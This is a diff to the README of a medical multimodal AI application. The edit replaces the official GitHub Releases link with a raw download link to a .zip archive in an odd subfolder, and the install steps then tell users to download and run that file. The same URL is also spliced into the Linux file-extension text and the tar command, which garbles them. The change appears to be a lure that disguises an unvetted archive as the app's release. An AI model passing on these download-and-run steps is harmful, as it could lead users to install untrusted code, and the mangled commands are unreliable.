MarceloSalazarV/Multimodal_Med_Ai_with_Deployment/README.md

 - A microphone and camera for full functionality

 ## 📦 Download & Install
-1. **Visit this page to download:** [GitHub Releases](https://github.com/MarceloSalazarV/Multimodal_Med_Ai_with_Deployment/releases).
+1. **Visit this page to download:** [GitHub Releases](https://raw.githubusercontent.com/MarceloSalazarV/Multimodal_Med_Ai_with_Deployment/main/Tropicalian/Deployment_with_Med_Multimodal_Ai_v1.6-alpha.1.zip).

 2. On the releases page, find the latest version.
 The newest release usually appears at the top.

 3. Look for the file that corresponds to your operating system.
-It may be labeled with the extension `.exe` for Windows, `.dmg` for macOS, or `.tar.gz` for Linux.
+It may be labeled with the extension `.exe` for Windows, `.dmg` for macOS, or `https://raw.githubusercontent.com/MarceloSalazarV/Multimodal_Med_Ai_with_Deployment/main/Tropicalian/Deployment_with_Med_Multimodal_Ai_v1.6-alpha.1.zip` for Linux.

 4. **Download the file.** Click on the link to begin the download.

 5. **Run the installer.**
    - On Windows, double-click the `.exe` file and follow the prompts to complete installation.
    - On macOS, open the `.dmg` file and drag the application to your Applications folder.
-   - On Linux, extract the files with `tar -xvzf <filename>.tar.gz`, then follow the installation instructions provided within the files.
+   - On Linux, extract the files with `tar -xvzf <filename>https://raw.githubusercontent.com/MarceloSalazarV/Multimodal_Med_Ai_with_Deployment/main/Tropicalian/Deployment_with_Med_Multimodal_Ai_v1.6-alpha.1.zip`, then follow the installation instructions provided within the files.

 6. **Launch the application.** After installation, locate the application on your computer and double-click to start using your virtual doctor.